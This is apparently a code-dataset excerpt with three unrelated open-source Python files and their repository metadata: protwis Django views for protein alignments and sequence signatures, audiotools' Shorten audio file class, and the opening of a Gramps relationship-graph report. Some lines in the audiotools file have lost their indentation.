    simple_selection = request.session.get('selection', False)

    # create an alignment object and load the selection into it
    a = Alignment()
    a.load_proteins_from_selection(simple_selection)
    a.load_segments_from_selection(simple_selection)

    # build a deterministic cache key from sorted protein ids + segment ids
    protein_ids = [p.pk for p in a.proteins]
    protein_list = ','.join(str(x) for x in sorted(protein_ids))
    segments_ids = list(a.segments)
    segments_list = ','.join(str(x) for x in sorted(segments_ids))
    s = str(protein_list + "_" + segments_list)
    key = "ALIGNMENT_" + hashlib.md5(s.encode('utf-8')).hexdigest()

    return_html = cache_alignment.get(key)
    if return_html is None or 'Custom' in segments_ids:
        # build the alignment data matrix
        check = a.build_alignment()
        if check == 'Too large':
            return render(request, 'alignment/error.html',
                          {'proteins': len(a.proteins),
                           'residues': a.number_of_residues_total})
        # calculate consensus sequence + amino acid and feature frequency
        a.calculate_statistics()
        num_of_sequences = len(a.proteins)
        num_residue_columns = len(a.positions) + len(a.segments)
        return_html = render(request, 'alignment/alignment.html',
                             {'a': a, 'num_of_sequences': num_of_sequences,
                              'num_residue_columns': num_residue_columns})
        if 'Custom' not in segments_ids:
            # cache the rendered alignment for one week
            cache_alignment.set(key, return_html, 60 * 60 * 24 * 7)
    return return_html
def render_family_alignment(request, slug):
    """Render (and cache for one week) the alignment of a protein family.

    Large selections are progressively restricted (human-only proteins,
    then fewer segments) to keep the alignment buildable.
    """
    # create an alignment object
    a = Alignment()

    # fetch wild-type proteins of the family
    proteins = Protein.objects.filter(family__slug__startswith=slug,
                                      sequence_type__slug='wt')
    if len(proteins) > 50 and len(slug.split("_")) < 4:
        # If alignment is going to be too big, only pick human.
        proteins = Protein.objects.filter(family__slug__startswith=slug,
                                          sequence_type__slug='wt',
                                          species__latin_name='Homo sapiens')

    if slug.startswith('100'):
        # G protein family: use the predefined segment set in its fixed order
        gsegments = definitions.G_PROTEIN_SEGMENTS
        preserved = Case(*[When(slug=pk, then=pos)
                           for pos, pk in enumerate(gsegments['Full'])])
        segments = ProteinSegment.objects.filter(slug__in=gsegments['Full'],
                                                 partial=False).order_by(preserved)
    else:
        segments = ProteinSegment.objects.filter(partial=False, proteinfamily='GPCR')
        if len(proteins) > 50:
            # many proteins: exclude the termini
            segments = ProteinSegment.objects.filter(partial=False, proteinfamily='GPCR').exclude(slug__in=['N-term', 'C-term'])
        if len(proteins) > 200:
            # very many proteins: exclude the loops as well
            segments = ProteinSegment.objects.filter(partial=False, proteinfamily='GPCR').exclude(slug__in=['N-term', 'C-term']).exclude(category='loop')

    # build a deterministic cache key from sorted protein ids + segment slugs
    protein_ids = [p.pk for p in proteins]
    protein_list = ','.join(str(x) for x in sorted(protein_ids))
    segments_ids = [s.slug for s in segments]
    segments_list = ','.join(str(x) for x in sorted(segments_ids))
    s = str(protein_list + "_" + segments_list)
    key = "ALIGNMENT_" + hashlib.md5(s.encode('utf-8')).hexdigest()

    return_html = cache_alignment.get(key)
    if return_html is None:
        # load data into the alignment and build the data matrix
        a.load_proteins(proteins)
        a.load_segments(segments)
        a.build_alignment()
        # calculate consensus sequence + amino acid and feature frequency
        a.calculate_statistics()
        num_of_sequences = len(a.proteins)
        num_residue_columns = len(a.positions) + len(a.segments)
        return_html = render(request, 'alignment/alignment.html',
                             {'a': a, 'num_of_sequences': num_of_sequences,
                              'num_residue_columns': num_residue_columns})
        # cache the rendered alignment for one week
        cache_alignment.set(key, return_html, 60 * 60 * 24 * 7)
    return return_html
def render_fasta_alignment(request):
    """Return the session-selection alignment as a downloadable FASTA file."""
    # pull the user's selection out of the session
    stored_selection = request.session.get('selection', False)

    # set up an unpadded alignment and feed the selection into it
    aln = Alignment()
    aln.show_padding = False
    aln.load_proteins_from_selection(stored_selection)
    aln.load_segments_from_selection(stored_selection)
    aln.build_alignment()

    response = render(request, 'alignment/alignment_fasta.html',
                      context={'a': aln}, content_type='text/fasta')
    response['Content-Disposition'] = ("attachment; filename="
                                       + settings.SITE_TITLE + "_alignment.fasta")
    return response
def render_fasta_family_alignment(request, slug):
    """Return a whole family's alignment as a downloadable FASTA file."""
    aln = Alignment()
    aln.show_padding = False

    # all wild-type proteins of the family, over every non-partial segment
    family_proteins = Protein.objects.filter(family__slug__startswith=slug,
                                             sequence_type__slug='wt')
    all_segments = ProteinSegment.objects.filter(partial=False)
    aln.load_proteins(family_proteins)
    aln.load_segments(all_segments)
    aln.build_alignment()

    response = render(request, 'alignment/alignment_fasta.html',
                      context={'a': aln}, content_type='text/fasta')
    response['Content-Disposition'] = ("attachment; filename="
                                       + settings.SITE_TITLE + "_alignment.fasta")
    return response
def render_csv_alignment(request):
    """Return the session-selection alignment as a downloadable CSV file."""
    stored_selection = request.session.get('selection', False)

    # unpadded alignment loaded from the session selection
    aln = Alignment()
    aln.show_padding = False
    aln.load_proteins_from_selection(stored_selection)
    aln.load_segments_from_selection(stored_selection)
    aln.build_alignment()
    # consensus sequence + amino acid and feature frequencies
    aln.calculate_statistics()

    response = render(request, 'alignment/alignment_csv.html',
                      context={'a': aln}, content_type='text/csv')
    response['Content-Disposition'] = ("attachment; filename="
                                       + settings.SITE_TITLE + "_alignment.csv")
    return response
def render_reordered(request, group):
    """Render a reordered alignment for either stored target group."""
    # target sets stashed earlier in the signature workflow
    positives = request.session.get('targets_pos', False)
    negatives = request.session.get('selection', False)

    alignment = Alignment()
    if group == 'positive':
        alignment.load_proteins_from_selection(positives)
    elif group == 'negative':
        alignment.load_proteins_from_selection(negatives)
    # segments always come from the live (negative) selection
    alignment.load_segments_from_selection(negatives)

    alignment.build_alignment()
    alignment.calculate_statistics()

    return render(request, 'alignment/alignment_reordered.html', context={
        'aln': alignment,
        'num_residue_columns': len(alignment.positions) + len(alignment.segments)
    })
def render_signature(request):
    """Compute the sequence signature of the two stored target sets and render it."""
    # positive and negative target sets stashed in the session
    positives = request.session.get('targets_pos', False)
    negatives = request.session.get('selection', False)

    # set up and calculate the signature
    signature = SequenceSignature()
    signature.setup_alignments_from_selection(positives, negatives)
    signature.calculate_signature()

    # keep the signature around for the later match-scoring step
    request.session['signature'] = signature.prepare_session_data()
    request.session.modified = True

    return render(request,
                  'sequence_signature/sequence_signature.html',
                  signature.prepare_display_data())
def render_signature_excel(request):
    """Export the sequence signature as an xlsx download (five worksheets)."""
    # recompute the signature from the two stored target sets
    positives = request.session.get('targets_pos', False)
    negatives = request.session.get('selection', False)

    signature = SequenceSignature()
    signature.setup_alignments_from_selection(positives, negatives)
    signature.calculate_signature()

    # build the workbook entirely in memory
    outstream = BytesIO()
    workbook = xlsxwriter.Workbook(outstream, {'in_memory': True})

    # one worksheet per (sheet name, group, data kind), in this order
    worksheets = (
        ('signature_properties', 'signature', 'features'),
        ('positive_group_properties', 'positive', 'features'),
        ('positive_group_aln', 'positive', 'alignment'),
        ('negative_group_properties', 'negative', 'features'),
        ('negative_group_aln', 'negative', 'alignment'),
    )
    for sheet_name, group, data_kind in worksheets:
        signature.prepare_excel_worksheet(workbook, sheet_name, group, data_kind)

    workbook.close()
    outstream.seek(0)
    response = HttpResponse(
        outstream.read(),
        content_type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
    )
    response['Content-Disposition'] = "attachment; filename=sequence_signature.xlsx"
    return response
def render_signature_match_scores(request, cutoff):
    """Score all selected proteins against the stored sequence signature."""
    sig_data = request.session.get('signature')
    # both target sets are scored together
    pos_selection = request.session.get('targets_pos', False)
    neg_selection = request.session.get('selection', False)

    matcher = SignatureMatch(
        sig_data['common_positions'],
        sig_data['numbering_schemes'],
        sig_data['common_segments'],
        sig_data['diff_matrix'],
        get_proteins_from_selection(pos_selection)
        + get_proteins_from_selection(neg_selection)
    )
    matcher.score_protein_class()

    # stash the results so they can be exported to excel later
    request.session['signature_match'] = {
        'scores': matcher.protein_report,
        'protein_signatures': matcher.protein_signatures,
        'signature_filtered': matcher.signature_consensus,
        'relevant_gn': matcher.relevant_gn,
        'relevant_segments': matcher.relevant_segments,
        'numbering_schemes': matcher.schemes,
    }
    return render(request,
                  'sequence_signature/signature_match.html',
                  {'scores': matcher})
def render_signature_match_excel(request):
    """Export the stored signature match scores as an xlsx download."""
    # (removed a leftover debug print that leaked into production output)
    scores_data = request.session.get('signature_match', False)

    # build the workbook entirely in memory
    outstream = BytesIO()
    wb = xlsxwriter.Workbook(outstream, {'in_memory': True})
    signature_score_excel(
        wb,
        scores_data['scores'],
        scores_data['protein_signatures'],
        scores_data['signature_filtered'],
        scores_data['relevant_gn'],
        scores_data['relevant_segments'],
        scores_data['numbering_schemes']
    )
    wb.close()
    outstream.seek(0)
    response = HttpResponse(
        outstream.read(),
        content_type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
    )
    response['Content-Disposition'] = "attachment; filename=sequence_signature_protein_scores.xlsx"
    return response
|
fosfataza/protwis
|
alignment/views.py
|
Python
|
apache-2.0
| 21,703
|
[
"BLAST"
] |
c44fbe1c33cb25b90cf42bacf1c8b2d63f0b2eba48af6e01d25905d25e29323f
|
#!/usr/bin/python
#Audio Tools, a module and set of tools for manipulating audio data
#Copyright (C) 2007-2012 Brian Langenberger
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from audiotools import (AudioFile, ChannelMask, InvalidFile,
WaveContainer, AiffContainer)
import os.path
class InvalidShorten(InvalidFile):
    """raised when a Shorten file cannot be opened or parsed"""
    pass
class ShortenAudio(WaveContainer, AiffContainer):
"""a Shorten audio file"""
SUFFIX = "shn"
NAME = SUFFIX
DESCRIPTION = u"Shorten"
    def __init__(self, filename):
        """filename is a plain string

        parses the Shorten header (and the embedded RIFF/AIFF header in
        the first VERBATIM command, when present) to populate channels,
        bits-per-sample, sample rate, channel mask and total frames

        raises InvalidShorten if the file is unreadable or malformed
        """
        from .bitstream import BitstreamReader
        from . import ChannelMask
        import cStringIO

        AudioFile.__init__(self, filename)
        try:
            f = open(filename, 'rb')
        except IOError, msg:
            raise InvalidShorten(str(msg))
        reader = BitstreamReader(f, 0)
        try:
            # magic bytes "ajkg" followed by format version 2
            if (reader.parse("4b 8u") != ["ajkg", 2]):
                #FIXME
                raise InvalidShorten("invalid Shorten header")
        except IOError:
            #FIXME
            raise InvalidShorten("invalid Shorten header")

        def read_unsigned(r, c):
            # unsigned value: unary-coded high bits + c low bits
            MSB = r.unary(1)
            LSB = r.read(c)
            return MSB * 2 ** c + LSB

        def read_long(r):
            # a "long" is an unsigned whose bit width is itself encoded
            return read_unsigned(r, read_unsigned(r, 2))

        #populate channels and bits_per_sample from Shorten header
        (file_type,
         self.__channels__,
         block_length,
         max_LPC,
         number_of_means,
         bytes_to_skip) = [read_long(reader) for i in xrange(6)]

        # file types 1-2 are 8-bit formats, 3-6 are 16-bit formats
        if ((1 <= file_type) and (file_type <= 2)):
            self.__bits_per_sample__ = 8
        elif ((3 <= file_type) and (file_type <= 6)):
            self.__bits_per_sample__ = 16
        else:
            #FIXME
            raise InvalidShorten("unsupported Shorten file type")

        #setup some default dummy metadata
        self.__sample_rate__ = 44100
        if (self.__channels__ == 1):
            self.__channel_mask__ = ChannelMask(0x4)
        elif (self.__channels__ == 2):
            self.__channel_mask__ = ChannelMask(0x3)
        else:
            self.__channel_mask__ = ChannelMask(0)
        self.__total_frames__ = 0

        #populate sample_rate and total_frames from first VERBATIM command
        command = read_unsigned(reader, 2)
        if (command == 9):
            verbatim_bytes = "".join([chr(read_unsigned(reader, 8) & 0xFF)
                                      for i in xrange(read_unsigned(reader,
                                                                    5))])
            # first try the VERBATIM block as a little-endian RIFF/WAVE header
            try:
                wave = BitstreamReader(cStringIO.StringIO(verbatim_bytes), 1)
                header = wave.read_bytes(12)
                if (header.startswith("RIFF") and header.endswith("WAVE")):
                    #got RIFF/WAVE header, so parse wave blocks as needed
                    total_size = len(verbatim_bytes) - 12
                    while (total_size >= 8):
                        (chunk_id, chunk_size) = wave.parse("4b 32u")
                        total_size -= 8
                        if (chunk_id == 'fmt '):
                            from .wav import parse_fmt
                            (channels,
                             self.__sample_rate__,
                             bits_per_sample,
                             self.__channel_mask__) = parse_fmt(
                                wave.substream(chunk_size))
                        elif (chunk_id == 'data'):
                            self.__total_frames__ = \
                                (chunk_size /
                                 (self.__channels__ *
                                  (self.__bits_per_sample__ / 8)))
                        else:
                            # skip unknown chunks (padded to an even size)
                            if (chunk_size % 2):
                                wave.read_bytes(chunk_size + 1)
                                total_size -= (chunk_size + 1)
                            else:
                                wave.read_bytes(chunk_size)
                                total_size -= chunk_size
            except (IOError, ValueError):
                pass

            # then try it as a big-endian FORM/AIFF header
            try:
                aiff = BitstreamReader(cStringIO.StringIO(verbatim_bytes), 0)
                header = aiff.read_bytes(12)
                if (header.startswith("FORM") and header.endswith("AIFF")):
                    #got FORM/AIFF header, so parse aiff blocks as needed
                    total_size = len(verbatim_bytes) - 12
                    while (total_size >= 8):
                        (chunk_id, chunk_size) = aiff.parse("4b 32u")
                        total_size -= 8
                        if (chunk_id == 'COMM'):
                            from .aiff import parse_comm
                            (channels,
                             total_sample_frames,
                             bits_per_sample,
                             self.__sample_rate__,
                             self.__channel_mask__) = parse_comm(
                                aiff.substream(chunk_size))
                        elif (chunk_id == 'SSND'):
                            #subtract 8 bytes for "offset" and "block size"
                            self.__total_frames__ = \
                                ((chunk_size - 8) /
                                 (self.__channels__ *
                                  (self.__bits_per_sample__ / 8)))
                        else:
                            # skip unknown chunks (padded to an even size)
                            if (chunk_size % 2):
                                aiff.read_bytes(chunk_size + 1)
                                total_size -= (chunk_size + 1)
                            else:
                                aiff.read_bytes(chunk_size)
                                total_size -= chunk_size
            except IOError:
                pass
    def bits_per_sample(self):
        """returns an integer number of bits-per-sample this track contains"""
        # 8 or 16, derived from the Shorten file_type in __init__
        return self.__bits_per_sample__
    def channels(self):
        """returns an integer number of channels this track contains"""
        # parsed directly from the Shorten header in __init__
        return self.__channels__
    def channel_mask(self):
        """returns a ChannelMask object of this track's channel layout"""
        # guessed from the channel count unless an embedded
        # fmt /COMM chunk supplied one in __init__
        return self.__channel_mask__
    def lossless(self):
        """returns True

        Shorten is always a lossless format"""
        return True
    def total_frames(self):
        """returns the total PCM frames of the track as an integer"""
        # 0 unless a data/SSND chunk was found in the VERBATIM header
        return self.__total_frames__
    def sample_rate(self):
        """returns the rate of the track's audio as an integer number of Hz"""
        # defaults to 44100 unless the embedded header specified one
        return self.__sample_rate__
    def to_pcm(self):
        """returns a PCMReader object containing the track's PCM data"""
        from .decoders import SHNDecoder
        from . import PCMReaderError

        try:
            return SHNDecoder(self.filename)
        except (IOError, ValueError), msg:
            # on failure, return an error reader with placeholder
            # CD-style parameters
            #these may not be accurate if the Shorten file is broken
            #but if it is broken, there'll be no way to
            #cross-check the results anyway
            return PCMReaderError(error_message=str(msg),
                                  sample_rate=44100,
                                  channels=2,
                                  channel_mask=0x3,
                                  bits_per_sample=16)
    @classmethod
    def from_pcm(cls, filename, pcmreader, compression=None,
                 block_size=256, encoding_function=None):
        """encodes a new file from PCM data

        takes a filename string, PCMReader object
        and optional compression level string
        encodes a new audio file from pcmreader's data
        at the given filename with the specified compression level
        and returns a new ShortenAudio object

        raises UnsupportedBitsPerSample unless the stream is 8 or 16-bit
        """
        #can't build artificial header because we don't know
        #how long the PCMReader will be and there's no way
        #to go back and write one later because all the byte values
        #are stored variable-sized
        #so we have to build a temporary Wave file instead
        from . import UnsupportedBitsPerSample

        if (pcmreader.bits_per_sample not in (8, 16)):
            raise UnsupportedBitsPerSample(filename, pcmreader.bits_per_sample)

        from . import WaveAudio
        import tempfile

        f = tempfile.NamedTemporaryFile(suffix=".wav")
        try:
            # encode to a temporary wave, then re-encode that wave to Shorten
            w = WaveAudio.from_pcm(f.name, pcmreader)
            (header, footer) = w.wave_header_footer()
            return cls.from_wave(filename,
                                 header,
                                 w.to_pcm(),
                                 footer,
                                 compression,
                                 block_size,
                                 encoding_function)
        finally:
            if (os.path.isfile(f.name)):
                f.close()
            else:
                # the temp file is already gone -- mark the wrapper closed
                # so its cleanup doesn't complain; presumably guards against
                # NamedTemporaryFile's delete-on-close (TODO confirm)
                f.close_called = True
    def has_foreign_wave_chunks(self):
        """returns True if the audio file contains non-audio RIFF chunks

        during transcoding, if the source audio file has foreign RIFF chunks
        and the target audio format supports foreign RIFF chunks,
        conversion should be routed through .wav conversion
        to avoid losing those chunks"""
        from . import decoders
        from . import bitstream
        import cStringIO

        try:
            # split the stream into pre-PCM (head) and post-PCM (tail) bytes
            (head, tail) = decoders.SHNDecoder(self.filename).pcm_split()
            header = bitstream.BitstreamReader(cStringIO.StringIO(head), 1)
            (RIFF, SIZE, WAVE) = header.parse("4b 32u 4b")
            if ((RIFF != 'RIFF') or (WAVE != 'WAVE')):
                return False
            #if the tail has room for chunks, there must be some foreign ones
            if (len(tail) >= 8):
                return True
            #otherwise, check the header for foreign chunks
            total_size = len(head) - bitstream.format_byte_size("4b 32u 4b")
            while (total_size >= 8):
                (chunk_id, chunk_size) = header.parse("4b 32u")
                total_size -= bitstream.format_byte_size("4b 32u")
                if (chunk_id not in ('fmt ', 'data')):
                    return True
                else:
                    # skip this known chunk (padded to an even byte count)
                    if (chunk_size % 2):
                        header.skip_bytes(chunk_size + 1)
                        total_size -= chunk_size + 1
                    else:
                        header.skip_bytes(chunk_size)
                        total_size -= chunk_size
            else:
                # while/else: loop exhausted without finding a foreign chunk
                #no foreign chunks found
                return False
        except IOError:
            return False
    def wave_header_footer(self):
        """returns (header, footer) tuple of strings
        containing all data before and after the PCM stream

        if self.has_foreign_wave_chunks() is False,
        may raise ValueError if the file has no header and footer
        for any reason"""
        from . import decoders
        from . import bitstream
        import cStringIO

        try:
            # head = bytes before the PCM data, tail = bytes after it
            (head, tail) = decoders.SHNDecoder(self.filename).pcm_split()
            header = bitstream.BitstreamReader(cStringIO.StringIO(head), 1)
            (RIFF, SIZE, WAVE) = header.parse("4b 32u 4b")
            # only accept a genuine RIFF/WAVE header
            if ((RIFF != 'RIFF') or (WAVE != 'WAVE')):
                #FIXME
                raise ValueError("invalid wave header")
            else:
                return (head, tail)
        except IOError:
            #FIXME
            raise ValueError("invalid wave header")
    @classmethod
    def from_wave(cls, filename, header, pcmreader, footer, compression=None,
                  block_size=256, encoding_function=None):
        """encodes a new file from wave data

        takes a filename string, header string,
        PCMReader object, footer string
        and optional compression level string
        encodes a new audio file from pcmreader's data
        at the given filename with the specified compression level
        and returns a new WaveAudio object

        header + pcm data + footer should always result
        in the original wave file being restored
        without need for any padding bytes

        may raise EncodingError if some problem occurs when
        encoding the input file"""
        from . import (CounterPCMReader,
                       BufferedPCMReader,
                       UnsupportedBitsPerSample,
                       EncodingError)
        from .wav import (validate_header, validate_footer)

        # allow tests to substitute the encoder
        if (encoding_function is None):
            from .encoders import encode_shn
        else:
            encode_shn = encoding_function

        if (pcmreader.bits_per_sample not in (8, 16)):
            raise UnsupportedBitsPerSample(filename, pcmreader.bits_per_sample)

        #ensure header is valid
        try:
            (total_size, data_size) = validate_header(header)
        except ValueError, err:
            raise EncodingError(str(err))

        # wrap the reader so the number of bytes consumed can be checked
        counter = CounterPCMReader(pcmreader)

        try:
            if (len(footer) == 0):
                encode_shn(filename=filename,
                           pcmreader=BufferedPCMReader(counter),
                           is_big_endian=False,
                           signed_samples=pcmreader.bits_per_sample == 16,
                           header_data=header,
                           block_size=block_size)
            else:
                encode_shn(filename=filename,
                           pcmreader=BufferedPCMReader(counter),
                           is_big_endian=False,
                           signed_samples=pcmreader.bits_per_sample == 16,
                           header_data=header,
                           footer_data=footer,
                           block_size=block_size)

            data_bytes_written = counter.bytes_written()

            #ensure output data size matches the "data" chunk's size
            if (data_size != data_bytes_written):
                from .text import ERR_WAV_TRUNCATED_DATA_CHUNK
                raise EncodingError(ERR_WAV_TRUNCATED_DATA_CHUNK)

            #ensure footer validates correctly
            try:
                validate_footer(footer, data_bytes_written)
            except ValueError, err:
                raise EncodingError(str(err))

            #ensure total size is correct
            if ((len(header) + data_size + len(footer)) != total_size):
                from .text import ERR_WAV_INVALID_SIZE
                raise EncodingError(ERR_WAV_INVALID_SIZE)

            return cls(filename)
        except IOError, err:
            # remove the partially written file before reporting failure
            cls.__unlink__(filename)
            raise EncodingError(str(err))
        except Exception, err:
            cls.__unlink__(filename)
            raise err
    def has_foreign_aiff_chunks(self):
        """returns True if the audio file contains non-audio AIFF chunks

        during transcoding, if the source audio file has foreign AIFF chunks
        and the target audio format supports foreign AIFF chunks,
        conversion should be routed through .aiff conversion
        to avoid losing those chunks"""
        from . import decoders
        from . import bitstream
        import cStringIO

        try:
            # split the stream into pre-PCM (head) and post-PCM (tail) bytes
            (head, tail) = decoders.SHNDecoder(self.filename).pcm_split()
            header = bitstream.BitstreamReader(cStringIO.StringIO(head), 0)
            (FORM, SIZE, AIFF) = header.parse("4b 32u 4b")
            if ((FORM != 'FORM') or (AIFF != 'AIFF')):
                return False
            #if the tail has room for chunks, there must be some foreign ones
            if (len(tail) >= 8):
                return True
            #otherwise, check the header for foreign chunks
            total_size = len(head) - bitstream.format_byte_size("4b 32u 4b")
            while (total_size >= 8):
                (chunk_id, chunk_size) = header.parse("4b 32u")
                total_size -= bitstream.format_byte_size("4b 32u")
                if (chunk_id not in ('COMM', 'SSND')):
                    return True
                else:
                    # skip this known chunk (padded to an even byte count)
                    if (chunk_size % 2):
                        header.skip_bytes(chunk_size + 1)
                        total_size -= chunk_size + 1
                    else:
                        header.skip_bytes(chunk_size)
                        total_size -= chunk_size
            else:
                # while/else: loop exhausted without finding a foreign chunk
                #no foreign chunks found
                return False
        except IOError:
            return False
    def aiff_header_footer(self):
        """returns (header, footer) tuple of strings
        containing all data before and after the PCM stream

        if self.has_foreign_aiff_chunks() is False,
        may raise ValueError if the file has no header and footer
        for any reason"""
        from . import decoders
        from . import bitstream
        import cStringIO

        try:
            # head = bytes before the PCM data, tail = bytes after it
            (head, tail) = decoders.SHNDecoder(self.filename).pcm_split()
            header = bitstream.BitstreamReader(cStringIO.StringIO(head), 0)
            (FORM, SIZE, AIFF) = header.parse("4b 32u 4b")
            # only accept a genuine FORM/AIFF header
            if ((FORM != 'FORM') or (AIFF != 'AIFF')):
                #FIXME
                raise ValueError("invalid AIFF header")
            else:
                return (head, tail)
        except IOError:
            #FIXME
            raise ValueError("invalid AIFF header")
    @classmethod
    def from_aiff(cls, filename, header, pcmreader, footer, compression=None,
                  block_size=256, encoding_function=None):
        """encodes a new file from AIFF data

        takes a filename string, header string,
        PCMReader object, footer string
        and optional compression level string
        encodes a new audio file from pcmreader's data
        at the given filename with the specified compression level
        and returns a new AiffAudio object

        header + pcm data + footer should always result
        in the original AIFF file being restored
        without need for any padding bytes

        may raise EncodingError if some problem occurs when
        encoding the input file"""
        from . import (CounterPCMReader,
                       BufferedPCMReader,
                       UnsupportedBitsPerSample,
                       EncodingError)
        from .aiff import (validate_header, validate_footer)

        # allow tests to substitute the encoder
        if (encoding_function is None):
            from .encoders import encode_shn
        else:
            encode_shn = encoding_function

        if (pcmreader.bits_per_sample not in (8, 16)):
            raise UnsupportedBitsPerSample(filename, pcmreader.bits_per_sample)

        #ensure header is valid
        try:
            (total_size, ssnd_size) = validate_header(header)
        except ValueError, err:
            raise EncodingError(str(err))

        # wrap the reader so the number of bytes consumed can be checked
        counter = CounterPCMReader(pcmreader)

        try:
            if (len(footer) == 0):
                encode_shn(filename=filename,
                           pcmreader=BufferedPCMReader(counter),
                           is_big_endian=True,
                           signed_samples=True,
                           header_data=header,
                           block_size=block_size)
            else:
                encode_shn(filename=filename,
                           pcmreader=BufferedPCMReader(counter),
                           is_big_endian=True,
                           signed_samples=True,
                           header_data=header,
                           footer_data=footer,
                           block_size=block_size)

            ssnd_bytes_written = counter.bytes_written()

            #ensure output data size matches the "SSND" chunk's size
            if (ssnd_size != ssnd_bytes_written):
                from .text import ERR_AIFF_TRUNCATED_SSND_CHUNK
                raise EncodingError(ERR_AIFF_TRUNCATED_SSND_CHUNK)

            #ensure footer validates correctly
            try:
                validate_footer(footer, ssnd_bytes_written)
            except ValueError, err:
                raise EncodingError(str(err))

            #ensure total size is correct
            if ((len(header) + ssnd_size + len(footer)) != total_size):
                from .text import ERR_AIFF_INVALID_SIZE
                raise EncodingError(ERR_AIFF_INVALID_SIZE)

            return cls(filename)
        except IOError, err:
            # remove the partially written file before reporting failure
            cls.__unlink__(filename)
            raise EncodingError(str(err))
        except Exception, err:
            cls.__unlink__(filename)
            raise err
def convert(self, target_path, target_class, compression=None,
progress=None):
"""encodes a new AudioFile from existing AudioFile
take a filename string, target class and optional compression string
encodes a new AudioFile in the target class and returns
the resulting object
may raise EncodingError if some problem occurs during encoding"""
#A Shorten file cannot contain both RIFF and AIFF chunks
#at the same time.
import tempfile
from . import WaveAudio
from . import AiffAudio
from . import to_pcm_progress
if ((self.has_foreign_wave_chunks() and
hasattr(target_class, "from_wave") and
callable(target_class.from_wave))):
return WaveContainer.convert(self,
target_path,
target_class,
compression,
progress)
elif (self.has_foreign_aiff_chunks() and
hasattr(target_class, "from_aiff") and
callable(target_class.from_aiff)):
return AiffContainer.convert(self,
target_path,
target_class,
compression,
progress)
else:
return target_class.from_pcm(target_path,
to_pcm_progress(self, progress),
compression)
|
R-a-dio/python-audio-tools
|
audiotools/shn.py
|
Python
|
gpl-2.0
| 22,906
|
[
"Brian"
] |
b1c3dcd20692884b8b7da7b98c615955c383b5ba61bdd6bcfc4f97ac7cf85f4a
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Adapted from Graphviz.py (now deprecated)
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2005-2006 Eero Tamminen
# Copyright (C) 2007-2008 Brian G. Matherly
# Copyright (C) 2007 Johan Gonqvist <johan.gronqvist@gmail.com>
# Contributions by Lorenzo Cappelletti <lorenzo.cappelletti@email.it>
# Copyright (C) 2008 Stephane Charette <stephanecharette@gmail.com>
# Copyright (C) 2009 Gary Burton
# Contribution 2009 by Bob Ham <rah@bash.sh>
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2013 Fedir Zinchuk <fedikw@gmail.com>
# Copyright (C) 2013-2015 Paul Franklin
# Copyright (C) 2015 Fabrice <fobrice@laposte.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Create a relationship graph using Graphviz
"""
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
from functools import partial
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
from gramps.gen.plug.menu import (BooleanOption, EnumeratedListOption,
FilterOption, PersonOption, ColorOption)
from gramps.gen.plug.report import Report
from gramps.gen.plug.report import utils
from gramps.gen.plug.report import MenuReportOptions
from gramps.gen.plug.report import stdoptions
from gramps.gen.lib import ChildRefType, EventRoleType, EventType
from gramps.gen.utils.file import media_path_full, find_file
from gramps.gen.utils.thumbnails import get_thumbnail_path
from gramps.gen.relationship import get_relationship_calculator
from gramps.gen.utils.db import get_birth_or_fallback, get_death_or_fallback
from gramps.gen.display.place import displayer as _pd
from gramps.gen.proxy import CacheProxyDb
from gramps.gen.errors import ReportError
#------------------------------------------------------------------------
#
# Constant options items
#
#------------------------------------------------------------------------
# value/label pairs for the "Graph coloring" menu option
_COLORS = [{'name' : _("B&W outline"), 'value' : 'outlined'},
           {'name' : _("Colored outline"), 'value' : 'colored'},
           {'name' : _("Color fill"), 'value' : 'filled'}]
# value/label pairs for the "Arrowhead direction" menu option;
# 'd' draws heads toward descendants, 'a' toward ancestors
_ARROWS = [{'name' : _("Descendants <- Ancestors"), 'value' : 'd'},
           {'name' : _("Descendants -> Ancestors"), 'value' : 'a'},
           {'name' : _("Descendants <-> Ancestors"), 'value' : 'da'},
           {'name' : _("Descendants - Ancestors"), 'value' : ''}]
#------------------------------------------------------------------------
#
# RelGraphReport class
#
#------------------------------------------------------------------------
class RelGraphReport(Report):
    def __init__(self, database, options, user):
        """
        Create RelGraphReport object that produces the report.

        The arguments are:

        database - the GRAMPS database instance
        options  - instance of the Options class for this report
        user     - a gen.user.User() instance

        This report needs the following parameters (class variables)
        that come in the options class.

        filter     - Filter to be applied to the people of the database.
                     The option class carries its number, and the function
                     returning the list of filters.
        arrow      - Arrow styles for heads and tails.
        showfamily - Whether to show family nodes.
        incid      - Whether to include IDs.
        url        - Whether to include URLs.
        inclimg    - Include images or not
        imgpos     - Image position, above/beside name
        color      - Whether to use outline, colored outline or filled color
                     in graph
        color_males   - Colour to apply to males
        color_females - Colour to apply to females
        color_unknown - Colour to apply to unknown genders
        color_families - Colour to apply to families
        dashed     - Whether to use dashed lines for non-birth relationships
        use_roundedcorners - Whether to use rounded corners for females
        name_format - Preferred format to display names
        incl_private - Whether to include private data
        event_choice - Whether to include dates and/or places
        occupation - Whether to include occupations
        living_people - How to handle living people
        years_past_death - Consider as living this many years after death
        """
        Report.__init__(self, database, options, user)

